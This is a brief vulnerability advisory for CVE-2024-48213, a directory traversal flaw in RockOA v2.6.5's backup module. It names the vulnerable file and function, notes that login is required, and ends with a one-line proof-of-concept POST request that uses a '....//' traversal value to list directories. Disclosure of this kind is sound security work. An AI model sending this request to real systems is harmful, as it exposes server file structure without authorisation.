CVE-2024-48213
RockOA v2.6.5 is vulnerable to Directory Traversal in webmain/system/beifen/beifenAction.php
.
Directory Traversal
rockoa v2.6.5 - rockoa v2.6.5
webmain/system/beifen/beifenAction.php # beifenClassAction # getdatssssAjax()
Remote
True
Listing directory
Login first, then:
POST /index.php?a=getdatssss&m=beifen&d=system&ajaxbool=true folder=....//....//